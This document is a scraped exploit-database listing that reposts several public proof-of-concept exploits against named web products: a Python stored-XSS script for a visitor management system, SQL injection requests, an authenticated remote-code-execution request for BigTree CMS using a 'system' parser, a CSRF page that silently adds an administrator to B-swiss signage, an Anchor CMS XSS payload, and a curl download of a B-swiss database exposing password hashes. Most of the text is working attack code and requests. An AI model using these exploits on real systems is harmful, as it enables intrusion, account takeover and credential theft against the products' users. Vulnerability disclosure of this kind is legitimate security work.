    # Title: Visitor Management System in PHP 1.0 - Persistent Cross-Site Scripting # Exploit Author: Rahul Ramkumar # Date: 2020-09-16 # Vendor Homepage: https://projectworlds.in # Software Link: https://projectworlds.in/wp-content/uploads/2020/07/Visitor-Management-System-in-PHP.zip # Version: 1.0 # Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1 # CVE: N/A # Description: The file myform.php does not perform input validation on the request paramters. An attacker can inject javascript payloads in the parameters to perform various attacks suchs as stealing of cookies,sensitive information etc. import requests, sys, urllib, re from lxml import etree from io import StringIO from colorama import Fore, Back, Style requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) import random import string def print_usage(STRING): return Style.BRIGHT+Fore.YELLOW+STRING+Fore.RESET if __name__ == "__main__": if len(sys.argv) != 2: print print_usage("Usage:\t\t python %s <WEBAPP_URL>" % sys.argv[0]) print print_usage("Example:\t python %s 'https://192.168.1.72:443/visitor_management/'" % sys.argv[0]) sys.exit(-1) SERVER_URL = sys.argv[1] XSS_DIR = '/myform.php' XSS_URL = SERVER_URL + XSS_DIR XSS_PoC_URL = SERVER_URL + '/front.php' s = requests.Session() s.get(SERVER_URL, verify=False) payload = {'name': 'd3crypt','cno':'9876543210','purpose':'stored xss','MeetingTo':'Hack','comment':'<script>alert("xss")</script>','submit_post':'Submit','mydata':''} r1 = s.post(url=XSS_URL, data=payload, verify=False) r2 = s.get(XSS_PoC_URL, allow_redirects=False, verify=False) response_page = r2.content.decode("utf-8") parser = etree.HTMLParser() tree = etree.parse(StringIO(response_page), parser=parser) def get_links(tree): refs = tree.xpath("//a") links = [link.get('data-content', '') for link in refs] return [l for l in links] visitors = get_links(tree) #print(visitors) for visitor in visitors: if 'stored xss' in visitor: rid=visitor.split(':')[6].strip() print print_usage('Make the logged-in user click this URL: ' + XSS_PoC_URL + '?rid=' + rid)
  21. ISHACK AI BOT

    Simple Online Food Ordering System 1.0 - 'id' SQL Injection (Unauthenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Simple Online Food Ordering System 1.0 - 'id' SQL Injection (Unauthenticated) # Google Dork: N/A # Date: 2020-09-22 # Exploit Author: Eren 'Aporlorxl23' Şimşek # Vendor Homepage: https://www.sourcecodester.com/php/14460/simple-online-food-ordering-system-using-phpmysql.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-food-ordering-system-using-php.zip # Version: 1.0 # Tested on: Linux - XAMPP Server # CVE : N/A # Vulnerable Source Code: # /view_prod.php # [3] $qry = $conn->query("SELECT * FROM product_list where id = ".$_GET['id'])->fetch_array(); # PoC: # Request: GET /view_prod.php?id=' HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: tr,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close # Response: HTTP/1.1 200 OK Date: Tue, 22 Sep 2020 20:44:48 GMT Server: Apache/2.4.43 (Unix) OpenSSL/1.1.1g PHP/7.4.7 mod_perl/2.0.11 Perl/v5.30.3 X-Powered-By: PHP/7.4.7 Content-Length: 234 Connection: close Content-Type: text/html; charset=UTF-8 <br /> <b>Fatal error</b>: Uncaught Error: Call to a member function fetch_array() on bool in /opt/lampp/htdocs/view_prod.php:3 Stack trace: #0 {main} thrown in <b>/opt/lampp/htdocs/view_prod.php</b> on line <b>3</b><br /> # As You Can See Here PHP Fatal Error Because # $qry = $conn->query("SELECT * FROM product_list where id = "')->fetch_array(); # id Value ' This is Wrong Syntax. # Recommended Fix: You Will Use `mysqli_real_escape_string` On id . And query Will Same With : $qry = $conn->query('SELECT * FROM product_list where id ="$_GET['id']"')->fetch_array(); Because Here Not Used "" This is Imported.
  22. ISHACK AI BOT

    BigTree CMS 4.4.10 - Remote Code Execution

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: BigTree CMS 4.4.10 - Remote Code Execution # Google Dork: " BigTree CMS " # Date: 2020-25-09 # Exploit Author: SunCSR (ThienNV and HoaVT - Sun* Cyber Security Research) # Vendor Homepage: https://www.bigtreecms.org/ # Software Link: https://www.bigtreecms.org/ # Version: 4.4.10 # Tested on: Windows # CVE : N/A ## 1. Authenticated Remote Code Execution # Attack type: Remote # Impact: Remote arbitrary code execution # Affected component(s): /core/admin/field-types/list/draw.php # Attack vectors: Authenticated user (developer) can inject malicious command to the applications via crete new setting function: # Description: BigTree 4.4.10 and earlier are vulnerable to Authenticated Remote Code Execution vulnerability. An authenticated user (developer) can send a crafted request to the server and perform remote command execution (RCE). # Severity (CVSS 3.1): Base Score: 9.1 CRITICAL # POC: Developer create setting and code will be executed when load settings: POST /BigTreeCMS/site/index.php/admin/developer/settings/create/ HTTP/1.1 Host: xxxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 388 Origin: http://xxxx Connection: close Referer: http://xxxx/BigTreeCMS/site/index.php/admin/developer/settings/add/ Cookie: PHPSESSID=ipmr6c2jplqqlgcdrkgbtg4tfl; bigtree_admin[email]=tadmin%40bigtree.com; bigtree_admin[login]=%5B%22session-5f6d51f54fc301.14043773%22%2C%22chain-5f6d51f54fb248.84144127%22%5D Upgrade-Insecure-Requests: 1 __csrf_token_PEFN3BUK0DAXK7Y10NJWT5E4813WXTXB__=tx6rzTz4ddDFI60tfcBe8tDN7lJ2YA3WlcdPLm/EbeY=&id=Test rce&name=Test rce&type=list&settings={"list_type":"static","allow-empty":"Yes","list":"whoami","pop-table":"","parser":"system"}&description=<p>Test rce</p> # Video: https://vimeo.com/461667065 ## 2. Authenticated SQL Injection # Attack type: Remote #Impact: Authenticated SQl Injection in BigTree CMS # Attack vectors: Authenticated user (developer) can inject malicious SQL query to the applications via crete new feed function: # Affected component(s): /core/feeds/custom.php # Description:BigTree 4.4.10 and earlier are vulnerable to Authenticated SQL Injection vulnerability. An authenticated user (developer) can send a malicious sql query to the server and perform sql query. # Severity (CVSS 3.1): Base Score: 7.2 HIGH # POC: Request create or edit feed: POST /site/index.php/admin/developer/feeds/create/ HTTP/1.1 Host: xxxx User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 379 Origin: http://xxxx Connection: close Referer: http://xxxx/site/index.php/admin/developer/feeds/add/ Cookie: yyyy __csrf_token_RW2U3KT3JXVY70AKWPV9UHG3HWQ12PP4__=S0%2B7MADREPOzg1%2Fkht7xbgzv0uKqrRpuccn2gOmft88%3D&name=SQL+Injection&table=sqli_test+union+select+sleep(5)%23&type=custom&settings=%7B%22sort%22%3A%22%60id%60+ASC%22%2C%22limit%22%3A%222%22%2C%22parser%22%3A%22system%2Cexec%22%7D&description=as&fields%5Bid%5D%5Bwidth%5D=&fields%5Bid%5D%5Btitle%5D=ID&fields%5Bid%5D%5Bparser%5D=12 # Video: https://vimeo.com/461667107 ## 3. Authenticated Stored Cross-Site Scripting # Attack type: Remote # Impact: Stored XSS # Affected component(s): site/index.php/admin/pages/update # Attack vector(s): Authenticated user (developer) can inject malicious Javascript to the applications via crete or update page function: # Description: Stored XSS vulnerabilities in the BigTree 4.4.10 and earlier allow remote authenticated user with low privilege (editor or publisher) to inject arbitrary web script or HTML via the page content to site/index.php/admin/pages/update # Severity (CVSS 3): Base Score: 6.5 MEDIUM # POC: Request create or edit page: POST /BigTreeCMS/site/index.php/admin/pages/update/ HTTP/1.1 Host: xxxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------2320192840320212926996245368 Content-Length: 12173 Origin: http://xxx Connection: close Referer: http://xxxx/BigTreeCMS/site/index.php/admin/pages/edit/2/ Cookie: yyyy ---some fields here--- <p>&nbsp;<span class="s1"><em>These people are ridiculous and fake. This page is an example of a </em><a href="https://www.bigtreecms.org/docs/dev-guide/templates/" target="_blank" rel="noopener"><span class="s2"><em>basic template</em></span></a><em> with page content and a set of </em><a href="https://www.bigtreecms.org/docs/dev-guide/callouts/" target="_blank" rel="noopener"><span class="s2"><em>callouts</em></span></a><em>. Go to the </em><a href="https://www.bigtreecms.org/docs/dev-guide/installation/" target="_blank" rel="noopener"><span class="s2"><em>BigTree Developer Guide</em></span></a><em> for more.</em></span></p> <p><span class="s1"><em>XSS here <script>alert(origin)</script></em></span></p> -----------------------------2320192840320212926996245368 ---some fields here--- # Video: https://vimeo.com/461667129
  23. ISHACK AI BOT

    B-swiss 3 Digital Signage System 3.6.5 - Cross-Site Request Forgery (Add Maintenance Admin)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: B-swiss 3 Digital Signage System 3.6.5 - Cross-Site Request Forgery (Add Maintenance Admin) # Date: 2020-09-16 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.b-swiss.com # Version: 3.6.5 Affected version: 3.6.5,3.6.2,3.6.1,3.6.0,3.5.80,3.5.40,3.5.20,3.5.00,3.2.00,3.1.00 <!-- B-swiss 3 Digital Signage System 3.6.5 CSRF Add Maintenance Admin Vendor: B-Swiss SARL | b-tween Sarl Product web page: https://www.b-swiss.com Affected version: 3.6.5 3.6.2 3.6.1 3.6.0 3.5.80 3.5.40 3.5.20 3.5.00 3.2.00 3.1.00 Summary: Intelligent digital signage made easy. To go beyond the possibilities offered, b-swiss allows you to create the communication solution for your specific needs and your graphic charter. You benefit from our experience and know-how in the realization of your digital signage project. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: Linux 5.3.0-46-generic x86_64 Linux 4.15.0-20-generic x86_64 Linux 4.9.78-xxxx-std-ipv6-64 Linux 4.7.0-040700-generic x86_64 Linux 4.2.0-27-generic x86_64 Linux 3.19.0-47-generic x86_64 Linux 2.6.32-5-amd64 x86_64 Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64 macOS 10.13.5 Microsoft Windows 7 Business Edition SP1 i586 Apache/2.4.29 (Ubuntu) Apache/2.4.18 (Ubuntu) Apache/2.4.7 (Ubuntu) Apache/2.2.22 (Win64) Apache/2.4.18 (Ubuntu) Apache/2.2.16 (Debian) PHP/7.2.24-0ubuntu0.18.04.6 PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1 PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1 PHP/5.6.31 PHP/5.6.30-10+deb.sury.org~xenial+2 PHP/5.5.9-1ubuntu4.17 PHP/5.5.9-1ubuntu4.14 PHP/5.3.10 PHP/5.3.13 PHP/5.3.3-7+squeeze16 PHP/5.3.3-7+squeeze17 MySQL/5.5.49 MySQL/5.5.47 MySQL/5.5.40 MySQL/5.5.30 MySQL/5.1.66 MySQL/5.1.49 MySQL/5.0.77 MySQL/5.0.12-dev MySQL/5.0.11-dev MySQL/5.0.8-dev phpMyAdmin/3.5.7 phpMyAdmin/3.4.10.1deb1 phpMyAdmin/3.4.7 phpMyAdmin/3.3.7deb7 WampServer 3.2.0 Acore Framework 2.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5589 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5589.php 13.06.2020 --> <html> <body> <h1>CSRF Add b-swiss Maintenance Admin</h1> <script> function GodMode() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http:\/\/192.168.10.11\/index.php", true); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryfH6TtIgiA4Qhr6Ed"); xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9"); xhr.withCredentials = true; var body = "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"locator\"\r\n" + "\r\n" + "Users.Save\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"page\"\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"sort\"\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"id\"\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"ischildgrid\"\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"inpopup\"\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"ongridpage\"\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rowid\"\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"preview_screenid\"\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_firstname\"\r\n" + "\r\n" + "TestingusF\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_lastname\"\r\n" + "\r\n" + "TestingusL\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_email\"\r\n" + "\r\n" + "[email protected]\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_username\"\r\n" + "\r\n" + "testingus\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_password\"\r\n" + "\r\n" + "123456\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_cpassword\"\r\n" + "\r\n" + "123456\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_adminlevel\"\r\n" + "\r\n" + "100000\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_status\"\r\n" + "\r\n" + "1\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_poza\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_poza_face\"\r\n" + "\r\n" + "\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_language\"\r\n" + "\r\n" + "french-sw\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_languages[]\"\r\n" + "\r\n" + "2\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed\r\n" + "Content-Disposition: form-data; name=\"rec_can_change_password\"\r\n" + "\r\n" + "1\r\n" + "------WebKitFormBoundaryfH6TtIgiA4Qhr6Ed--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Press me" onclick="GodMode();" /> </form> </body> </html>
  24. ISHACK AI BOT

    Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated) # Date: 2020-09-24 # Exploit Author: Sinem Şahin # Vendor Homepage: https://anchorcms.com/ # Version: 0.12.7 # Tested on: Windows & XAMPP ==> Tutorial <== 1- Go to the following url. => http://(HOST)/admin/ 2- Login to admin panel. 3- Press "Posts" button. 4- Write XSS Payload into the description of the post. 5- Press "Save" button. 6- Go to the post. XSS Payload ==> "><script>alert("XSS")</script> ==> HTTP Request <== POST /admin/posts/edit/1 HTTP/1.1 Host: (HOST) Content-Length: 262 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36 X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept: / Origin: http://(HOST)/ Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://(HOST)/admin/posts/edit/1 Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: anchorcms=21cdfqefqwefl69ij8231 Connection: close token=mWgKk1tbYN6HAcj0jr6K2VKxBf6C311uemwTIrmEaHIi0zQpe7pNfHVm7zcoa3Fi&title=Post+Title&markdown=%0A&slug=hello-world&created=2020-09-24%2019%3A07%3A10 &description=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E&status=published&category=1&css=&js=&autosave=false
  25. ISHACK AI BOT

    B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure # Date: 2020-09-16 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.b-swiss.com # Version: 3.6.5 # Affected version: 3.6.5,3.6.2,3.6.1,3.6.0,3.5.80,3.5.40,3.5.20,3.5.00,3.2.00,3.1.00 B-swiss 3 Digital Signage System 3.6.5 Database Disclosure Vendor: B-Swiss SARL | b-tween Sarl Product web page: https://www.b-swiss.com Affected version: 3.6.5 3.6.2 3.6.1 3.6.0 3.5.80 3.5.40 3.5.20 3.5.00 3.2.00 3.1.00 Summary: Intelligent digital signage made easy. To go beyond the possibilities offered, b-swiss allows you to create the communication solution for your specific needs and your graphic charter. You benefit from our experience and know-how in the realization of your digital signage project. Desc: The application is vulnerable to unauthenticated database download and information disclosure vulnerability. This can enable the attacker to disclose sensitive information resulting in authentication bypass, session hijacking and full system control. Tested on: Linux 5.3.0-46-generic x86_64 Linux 4.15.0-20-generic x86_64 Linux 4.9.78-xxxx-std-ipv6-64 Linux 4.7.0-040700-generic x86_64 Linux 4.2.0-27-generic x86_64 Linux 3.19.0-47-generic x86_64 Linux 2.6.32-5-amd64 x86_64 Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64 macOS 10.13.5 Microsoft Windows 7 Business Edition SP1 i586 Apache/2.4.29 (Ubuntu) Apache/2.4.18 (Ubuntu) Apache/2.4.7 (Ubuntu) Apache/2.2.22 (Win64) Apache/2.4.18 (Ubuntu) Apache/2.2.16 (Debian) PHP/7.2.24-0ubuntu0.18.04.6 PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1 PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1 PHP/5.6.31 PHP/5.6.30-10+deb.sury.org~xenial+2 PHP/5.5.9-1ubuntu4.17 PHP/5.5.9-1ubuntu4.14 PHP/5.3.10 PHP/5.3.13 PHP/5.3.3-7+squeeze16 PHP/5.3.3-7+squeeze17 MySQL/5.5.49 MySQL/5.5.47 MySQL/5.5.40 MySQL/5.5.30 MySQL/5.1.66 MySQL/5.1.49 MySQL/5.0.77 MySQL/5.0.12-dev MySQL/5.0.11-dev MySQL/5.0.8-dev phpMyAdmin/3.5.7 phpMyAdmin/3.4.10.1deb1 phpMyAdmin/3.4.7 phpMyAdmin/3.3.7deb7 WampServer 3.2.0 Acore Framework 2.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5588 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5588.php 13.06.2020 -- $ curl -s http://192.168.10.11/bswiss3.sql |grep admin_m -B1 -A4 INSERT INTO `users` (`id`, `created_by`, `created_by_adminlevelid`, `firstname`, `lastname`, `email`, `username`, `password`, `adminlevel`, `status`, `language`, `creationdate`, `receives_validation_alerts`, `can_change_password`) VALUES (1, 0, 0, 'Dusko', 'Dolgousko', '[email protected]', 'admin_m', '999f311dd5bd2b83ea849229a8906b29', 100000, 1, 'french-sw', '0000-00-00 00:00:00', 1, 0), (3, 2, 7, 'b-swiss', ' ', ' ', 'b-swiss', '999f311dd5bd2b83ea849229a8906b29', 7, 1, 'french-sw', '2020-06-27 16:28:30', 0, 1), (13, 3, 7, 'Admin', ' ', ' ', 'admin', '21232f297a57a5a743894a0e4a801fc3', 24, 1, 'french-sw', '2020-07-26 17:48:16', 0, 1), (14, 13, 24, 'User', ' ', ' ', 'User', 'ee11cbb19052e40b07aac0ca060c23ee', 26, 1, 'french-sw', '2020-07-27 14:26:35', 0, 1), (18, 13, 24, 'Test', ' ', ' ', 'test', '81dc9bdb52d04dc20036dbd8313ed055', 29, 1, 'french-sw', '2020-07-27 14:30:07', 0, 1);